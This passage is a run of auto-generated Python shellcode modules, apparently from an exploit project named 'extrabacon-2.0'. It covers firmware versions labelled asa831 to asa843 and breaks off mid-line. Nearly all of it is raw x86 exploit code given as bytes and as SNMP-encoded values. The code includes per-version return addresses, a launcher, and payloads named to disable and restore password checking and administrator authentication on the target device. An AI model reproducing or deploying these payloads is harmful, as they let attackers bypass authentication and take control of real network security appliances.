-------------------------------------------------------------------------------- 1 | # 2 | # this file autogenerated, do not touch 3 | # 4 | 5 | vers = "asa831" 6 | 7 | 8 | my_ret_addr_len = 4 9 | 10 | my_ret_addr_byte = "\x9d\xf3\x4a\x09" 11 | 12 | my_ret_addr_snmp = "157.243.74.9" 13 | 14 | 15 | finder_len = 9 16 | 17 | finder_byte = "\x8b\x7c\x24\x14\x8b\x07\xff\xe0\x90" 18 | 19 | finder_snmp = "139.124.36.20.139.7.255.224.144" 20 | 21 | 22 | preamble_len = 41 23 | 24 | preamble_byte = "\xb8\x29\x29\x67\xad\x35\xa5\xa5\xa5\xa5\x83\xec\x04\x89\x04\x24\x89\xe5\x83\xc5\x58\x31\xc0\x31\xdb\xb3\x10\x31\xf6\xbf\xae\xaa\xaa\xaa\x81\xf7\xa5\xa5\xa5\xa5\x60" 25 | 26 | preamble_snmp = "184.41.41.103.173.53.165.165.165.165.131.236.4.137.4.36.137.229.131.197.88.49.192.49.219.179.16.49.246.191.174.170.170.170.129.247.165.165.165.165.96" 27 | 28 | 29 | postscript_len = 2 30 | 31 | postscript_byte = "\x61\xc3" 32 | 33 | postscript_snmp = "97.195" 34 | 35 | 36 | successmsg_len = 19 37 | 38 | successmsg_byte = "\xb8\x0a\x8c\x91\x09\x50\xb8\xd5\xe9\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58" 39 | 40 | successmsg_snmp = "184.10.140.145.9.80.184.213.233.163.173.53.165.165.165.165.255.208.88" 41 | 42 | 43 | launcher_len = 11 44 | 45 | launcher_byte = "\x8b\x84\x24\xd8\x01\x00\x00\x04\x01\xff\xd0" 46 | 47 | launcher_snmp = "139.132.36.216.1.0.0.4.1.255.208" 48 | 49 | 50 | payload_nop_len = 116 51 | 52 | payload_nop_byte = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb8\x0a\x8c\x91\x09\x50\xb8\xd5\xe9\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58\xc3" 53 | 54 | payload_nop_snmp = 
"144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.184.10.140.145.9.80.184.213.233.163.173.53.165.165.165.165.255.208.88.195" 55 | 56 | 57 | payload_PMCHECK_DISABLE_len = 66 58 | 59 | payload_PMCHECK_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xd5\x90\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\xf0\x77\x35\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 60 | 61 | payload_PMCHECK_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.213.144.172.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.240.119.53.9.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 62 | 63 | 64 | payload_PMCHECK_ENABLE_len = 66 65 | 66 | payload_PMCHECK_ENABLE_byte = "\xeb\x14\xbf\xf0\x77\x35\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x31\xc0\x89\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xd5\x90\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 67 | 68 | payload_PMCHECK_ENABLE_snmp = "235.20.191.240.119.53.9.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.49.192.137.191.165.165.165.165.184.216.165.165.165.49.248.187.165.213.144.172.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 69 | 70 | 71 | payload_AAAADMINAUTH_DISABLE_len = 66 72 | 73 | payload_AAAADMINAUTH_DISABLE_byte = 
"\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x75\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x30\xdd\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 74 | 75 | payload_AAAADMINAUTH_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.117.163.173.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.48.221.6.8.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 76 | 77 | 78 | payload_AAAADMINAUTH_ENABLE_len = 66 79 | 80 | payload_AAAADMINAUTH_ENABLE_byte = "\xeb\x14\xbf\x30\xdd\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x89\xe5\x57\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x75\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 81 | 82 | payload_AAAADMINAUTH_ENABLE_snmp = "235.20.191.48.221.6.8.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.137.229.87.191.165.165.165.165.184.216.165.165.165.49.248.187.165.117.163.173.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 83 | 84 | -------------------------------------------------------------------------------- /extrabacon-2.0/versions/shellcode_asa832.py: -------------------------------------------------------------------------------- 1 | # 2 | # this file autogenerated, do not touch 3 | # 4 | 5 | vers = "asa832" 6 | 7 | 8 | my_ret_addr_len = 4 9 | 10 | my_ret_addr_byte = "\xdc\xcb\x45\x09" 11 | 12 | my_ret_addr_snmp = "220.203.69.9" 13 | 14 | 15 | finder_len = 9 16 | 17 | finder_byte = "\x8b\x7c\x24\x14\x8b\x07\xff\xe0\x90" 18 | 19 | finder_snmp = "139.124.36.20.139.7.255.224.144" 20 | 21 | 22 | preamble_len = 41 23 | 24 | preamble_byte = 
"\xb8\x59\x81\x66\xad\x35\xa5\xa5\xa5\xa5\x83\xec\x04\x89\x04\x24\x89\xe5\x83\xc5\x58\x31\xc0\x31\xdb\xb3\x10\x31\xf6\xbf\xae\xaa\xaa\xaa\x81\xf7\xa5\xa5\xa5\xa5\x60" 25 | 26 | preamble_snmp = "184.89.129.102.173.53.165.165.165.165.131.236.4.137.4.36.137.229.131.197.88.49.192.49.219.179.16.49.246.191.174.170.170.170.129.247.165.165.165.165.96" 27 | 28 | 29 | postscript_len = 2 30 | 31 | postscript_byte = "\x61\xc3" 32 | 33 | postscript_snmp = "97.195" 34 | 35 | 36 | successmsg_len = 19 37 | 38 | successmsg_byte = "\xb8\xca\x9a\x92\x09\x50\xb8\x75\xe9\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58" 39 | 40 | successmsg_snmp = "184.202.154.146.9.80.184.117.233.163.173.53.165.165.165.165.255.208.88" 41 | 42 | 43 | launcher_len = 11 44 | 45 | launcher_byte = "\x8b\x84\x24\xd8\x01\x00\x00\x04\x01\xff\xd0" 46 | 47 | launcher_snmp = "139.132.36.216.1.0.0.4.1.255.208" 48 | 49 | 50 | payload_nop_len = 116 51 | 52 | payload_nop_byte = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb8\xca\x9a\x92\x09\x50\xb8\x75\xe9\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58\xc3" 53 | 54 | payload_nop_snmp = "144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.184.202.154.146.9.80.184.117.233.163.173.53.165.165.165.165.255.208.88.195" 55 | 56 | 57 | payload_PMCHECK_DISABLE_len = 66 58 | 59 | payload_PMCHECK_DISABLE_byte = 
"\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xf5\x93\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x90\x54\x36\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 60 | 61 | payload_PMCHECK_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.245.147.172.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.144.84.54.9.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 62 | 63 | 64 | payload_PMCHECK_ENABLE_len = 66 65 | 66 | payload_PMCHECK_ENABLE_byte = "\xeb\x14\xbf\x90\x54\x36\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x31\xc0\x89\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xf5\x93\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 67 | 68 | payload_PMCHECK_ENABLE_snmp = "235.20.191.144.84.54.9.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.49.192.137.191.165.165.165.165.184.216.165.165.165.49.248.187.165.245.147.172.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 69 | 70 | 71 | payload_AAAADMINAUTH_DISABLE_len = 66 72 | 73 | payload_AAAADMINAUTH_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x75\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x10\xde\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 74 | 75 | payload_AAAADMINAUTH_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.117.163.173.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.16.222.6.8.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 76 | 77 | 78 | payload_AAAADMINAUTH_ENABLE_len = 66 79 | 80 | payload_AAAADMINAUTH_ENABLE_byte = 
"\xeb\x14\xbf\x10\xde\x06\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x89\xe5\x57\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x75\xa3\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 81 | 82 | payload_AAAADMINAUTH_ENABLE_snmp = "235.20.191.16.222.6.8.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.137.229.87.191.165.165.165.165.184.216.165.165.165.49.248.187.165.117.163.173.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 83 | 84 | -------------------------------------------------------------------------------- /extrabacon-2.0/versions/shellcode_asa841.py: -------------------------------------------------------------------------------- 1 | # 2 | # this file autogenerated, do not touch 3 | # 4 | 5 | vers = "asa841" 6 | 7 | 8 | my_ret_addr_len = 4 9 | 10 | my_ret_addr_byte = "\xad\x3a\x11\x09" 11 | 12 | my_ret_addr_snmp = "173.58.17.9" 13 | 14 | 15 | finder_len = 9 16 | 17 | finder_byte = "\x8b\x7c\x24\x14\x8b\x07\xff\xe0\x90" 18 | 19 | finder_snmp = "139.124.36.20.139.7.255.224.144" 20 | 21 | 22 | preamble_len = 41 23 | 24 | preamble_byte = "\xb8\xa3\xa9\x7e\xad\x35\xa5\xa5\xa5\xa5\x83\xec\x04\x89\x04\x24\x89\xe5\x83\xc5\x48\x31\xc0\x31\xdb\xb3\x10\x31\xf6\xbf\xae\xaa\xaa\xaa\x81\xf7\xa5\xa5\xa5\xa5\x60" 25 | 26 | preamble_snmp = "184.163.169.126.173.53.165.165.165.165.131.236.4.137.4.36.137.229.131.197.72.49.192.49.219.179.16.49.246.191.174.170.170.170.129.247.165.165.165.165.96" 27 | 28 | 29 | postscript_len = 2 30 | 31 | postscript_byte = "\x61\xc3" 32 | 33 | postscript_snmp = "97.195" 34 | 35 | 36 | successmsg_len = 19 37 | 38 | successmsg_byte = "\xb8\xf4\x0b\xaf\x09\x50\xb8\xc5\x1e\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58" 39 | 40 | successmsg_snmp = "184.244.11.175.9.80.184.197.30.163.173.53.165.165.165.165.255.208.88" 41 | 42 | 43 | launcher_len = 11 44 | 45 | launcher_byte = "\x8b\x84\x24\xe0\x01\x00\x00\x04\x01\xff\xd0" 46 | 47 | 
launcher_snmp = "139.132.36.224.1.0.0.4.1.255.208" 48 | 49 | 50 | payload_nop_len = 116 51 | 52 | payload_nop_byte = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb8\xf4\x0b\xaf\x09\x50\xb8\xc5\x1e\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58\xc3" 53 | 54 | payload_nop_snmp = "144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.184.244.11.175.9.80.184.197.30.163.173.53.165.165.165.165.255.208.88.195" 55 | 56 | 57 | payload_PMCHECK_DISABLE_len = 66 58 | 59 | payload_PMCHECK_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x55\xed\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\xf0\xfc\x48\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 60 | 61 | payload_PMCHECK_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.85.237.172.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.240.252.72.9.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 62 | 63 | 64 | payload_PMCHECK_ENABLE_len = 66 65 | 66 | payload_PMCHECK_ENABLE_byte = 
"\xeb\x14\xbf\xf0\xfc\x48\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x31\xc0\x89\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x55\xed\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 67 | 68 | payload_PMCHECK_ENABLE_snmp = "235.20.191.240.252.72.9.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.49.192.137.191.165.165.165.165.184.216.165.165.165.49.248.187.165.85.237.172.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 69 | 70 | 71 | payload_AAAADMINAUTH_DISABLE_len = 66 72 | 73 | payload_AAAADMINAUTH_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x95\xad\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\x90\x38\x08\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 74 | 75 | payload_AAAADMINAUTH_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.149.173.173.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.144.56.8.8.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 76 | 77 | 78 | payload_AAAADMINAUTH_ENABLE_len = 66 79 | 80 | payload_AAAADMINAUTH_ENABLE_byte = "\xeb\x14\xbf\x90\x38\x08\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x89\xe5\x57\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x95\xad\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 81 | 82 | payload_AAAADMINAUTH_ENABLE_snmp = "235.20.191.144.56.8.8.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.137.229.87.191.165.165.165.165.184.216.165.165.165.49.248.187.165.149.173.173.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 83 | 84 | -------------------------------------------------------------------------------- /extrabacon-2.0/versions/shellcode_asa842.py: 
-------------------------------------------------------------------------------- 1 | # 2 | # this file autogenerated, do not touch 3 | # 4 | 5 | vers = "asa842" 6 | 7 | 8 | my_ret_addr_len = 4 9 | 10 | my_ret_addr_byte = "\x19\x47\x14\x09" 11 | 12 | my_ret_addr_snmp = "25.71.20.9" 13 | 14 | 15 | finder_len = 9 16 | 17 | finder_byte = "\x8b\x7c\x24\x14\x8b\x07\xff\xe0\x90" 18 | 19 | finder_snmp = "139.124.36.20.139.7.255.224.144" 20 | 21 | 22 | preamble_len = 41 23 | 24 | preamble_byte = "\xb8\x43\x7b\x7a\xad\x35\xa5\xa5\xa5\xa5\x83\xec\x04\x89\x04\x24\x89\xe5\x83\xc5\x48\x31\xc0\x31\xdb\xb3\x10\x31\xf6\xbf\xae\xaa\xaa\xaa\x81\xf7\xa5\xa5\xa5\xa5\x60" 25 | 26 | preamble_snmp = "184.67.123.122.173.53.165.165.165.165.131.236.4.137.4.36.137.229.131.197.72.49.192.49.219.179.16.49.246.191.174.170.170.170.129.247.165.165.165.165.96" 27 | 28 | 29 | postscript_len = 2 30 | 31 | postscript_byte = "\x61\xc3" 32 | 33 | postscript_snmp = "97.195" 34 | 35 | 36 | successmsg_len = 19 37 | 38 | successmsg_byte = "\xb8\xdd\x28\xbb\x09\x50\xb8\x45\x66\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58" 39 | 40 | successmsg_snmp = "184.221.40.187.9.80.184.69.102.163.173.53.165.165.165.165.255.208.88" 41 | 42 | 43 | launcher_len = 11 44 | 45 | launcher_byte = "\x8b\x84\x24\xe0\x01\x00\x00\x04\x01\xff\xd0" 46 | 47 | launcher_snmp = "139.132.36.224.1.0.0.4.1.255.208" 48 | 49 | 50 | payload_nop_len = 116 51 | 52 | payload_nop_byte = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb8\xdd\x28\xbb\x09\x50\xb8\x45\x66\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58\xc3" 53 | 54 | payload_nop_snmp = 
"144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.184.221.40.187.9.80.184.69.102.163.173.53.165.165.165.165.255.208.88.195" 55 | 56 | 57 | payload_PMCHECK_DISABLE_len = 66 58 | 59 | payload_PMCHECK_DISABLE_byte = "\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x25\xf6\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\xf0\x8f\x53\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 60 | 61 | payload_PMCHECK_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.37.246.172.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.240.143.83.9.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 62 | 63 | 64 | payload_PMCHECK_ENABLE_len = 66 65 | 66 | payload_PMCHECK_ENABLE_byte = "\xeb\x14\xbf\xf0\x8f\x53\x09\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x31\xc0\x89\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\x25\xf6\xac\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 67 | 68 | payload_PMCHECK_ENABLE_snmp = "235.20.191.240.143.83.9.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.49.192.137.191.165.165.165.165.184.216.165.165.165.49.248.187.165.37.246.172.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 69 | 70 | 71 | payload_AAAADMINAUTH_DISABLE_len = 66 72 | 73 | payload_AAAADMINAUTH_DISABLE_byte = 
"\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xb5\xad\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa2\xa5\xa5\xa5\x31\xfa\xcd\x80\xeb\x14\xbf\xe0\x13\x08\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x0c\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x31\xc0\x40\xc3" 74 | 75 | payload_AAAADMINAUTH_DISABLE_snmp = "191.165.165.165.165.184.216.165.165.165.49.248.187.165.181.173.173.49.251.185.165.181.165.165.49.249.186.162.165.165.165.49.250.205.128.235.20.191.224.19.8.8.49.201.177.4.252.243.164.233.12.0.0.0.94.235.236.232.248.255.255.255.49.192.64.195" 76 | 77 | 78 | payload_AAAADMINAUTH_ENABLE_len = 66 79 | 80 | payload_AAAADMINAUTH_ENABLE_byte = "\xeb\x14\xbf\xe0\x13\x08\x08\x31\xc9\xb1\x04\xfc\xf3\xa4\xe9\x2f\x00\x00\x00\x5e\xeb\xec\xe8\xf8\xff\xff\xff\x55\x89\xe5\x57\xbf\xa5\xa5\xa5\xa5\xb8\xd8\xa5\xa5\xa5\x31\xf8\xbb\xa5\xb5\xad\xad\x31\xfb\xb9\xa5\xb5\xa5\xa5\x31\xf9\xba\xa0\xa5\xa5\xa5\x31\xfa\xcd\x80" 81 | 82 | payload_AAAADMINAUTH_ENABLE_snmp = "235.20.191.224.19.8.8.49.201.177.4.252.243.164.233.47.0.0.0.94.235.236.232.248.255.255.255.85.137.229.87.191.165.165.165.165.184.216.165.165.165.49.248.187.165.181.173.173.49.251.185.165.181.165.165.49.249.186.160.165.165.165.49.250.205.128" 83 | 84 | -------------------------------------------------------------------------------- /extrabacon-2.0/versions/shellcode_asa843.py: -------------------------------------------------------------------------------- 1 | # 2 | # this file autogenerated, do not touch 3 | # 4 | 5 | vers = "asa843" 6 | 7 | 8 | my_ret_addr_len = 4 9 | 10 | my_ret_addr_byte = "\xc8\x26\xa0\x09" 11 | 12 | my_ret_addr_snmp = "200.38.160.9" 13 | 14 | 15 | finder_len = 9 16 | 17 | finder_byte = "\x8b\x7c\x24\x14\x8b\x07\xff\xe0\x90" 18 | 19 | finder_snmp = "139.124.36.20.139.7.255.224.144" 20 | 21 | 22 | preamble_len = 41 23 | 24 | preamble_byte = 
"\xb8\x33\x7e\x45\xad\x35\xa5\xa5\xa5\xa5\x83\xec\x04\x89\x04\x24\x89\xe5\x83\xc5\x48\x31\xc0\x31\xdb\xb3\x10\x31\xf6\xbf\xae\xaa\xaa\xaa\x81\xf7\xa5\xa5\xa5\xa5\x60" 25 | 26 | preamble_snmp = "184.51.126.69.173.53.165.165.165.165.131.236.4.137.4.36.137.229.131.197.72.49.192.49.219.179.16.49.246.191.174.170.170.170.129.247.165.165.165.165.96" 27 | 28 | 29 | postscript_len = 2 30 | 31 | postscript_byte = "\x61\xc3" 32 | 33 | postscript_snmp = "97.195" 34 | 35 | 36 | successmsg_len = 19 37 | 38 | successmsg_byte = "\xb8\x1d\xc4\xbc\x09\x50\xb8\xe5\x60\xa3\xad\x35\xa5\xa5\xa5\xa5\xff\xd0\x58" 39 | 40 | successmsg_snmp = "184.29.196.188.9.80.184.229.96.163.173.53.165.165.165.165.255.208.88" 41 | 42 | 43 | launcher_len = 11 44 | 45 | launcher_byte = "\x8b\x84\x24\xe0\x01\x00\x00\x04\x01\xff\xd0" 46 | 47 | launcher_snmp = "139.132.36.224.1.0.0.4.1.255.208" 48 | 49 | 50 | payload_nop_len = 116 51 | 52 | payload_nop_byte = 